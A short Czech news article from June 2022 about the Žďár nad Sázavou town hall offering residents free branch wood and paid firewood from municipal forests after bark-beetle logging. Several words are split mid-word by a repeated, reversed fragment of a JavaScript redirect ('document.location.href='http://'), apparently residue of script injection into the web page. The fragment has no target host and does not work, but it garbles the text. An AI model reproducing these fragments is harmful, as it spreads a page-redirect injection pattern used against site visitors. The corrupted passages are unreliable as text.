Rainbow page separator

Žďárská radnice nabízí lidem dřevo z lesů, větve jsou zdarma

Pondělí, 27. června 2022

Žďár nad Sázavou / Takzvanou samovýrobu dřeva v městských lesích obyvatelům nabízí žďárská radnice. Mohou si tak například po těžbě spojené s postupující kůrovcovou kalami[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou nebo polomech z lesa zdarma odvézt klestí – větve či suky, které na místě zbyly po dřevařích – tedy současně pomoci čistit les. Další nabídka dřeva z městských lesů je již zpoplatněná, jedná se o zpracování zbytků kulatiny po těžbě, kdy kubík dřeva vyjde na 500 korun. Nejkvalitnější palivové dříví z nabídky radnice vyjde na 1050 korun za metr krychlový, kdy zájemci s trvalým bydlištěm ve Žďáře mají nárok na desetiprocentní slevu. I v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě se zájemce musí předem domluvit, dřevo v lese zpracovat a sám si zajistit jeho odvoz.
Vzhledem ke zdražování energií poptávka po palivovém dřevu vzrůstá. Samovýroba dřeva ve žďárských městských lesích má rovněž přispět k rychlejšímu zpracování stromů napadených kůrovcem, aby měl škůdce co nejvíce ztížený postup do dosud zdravých porostů.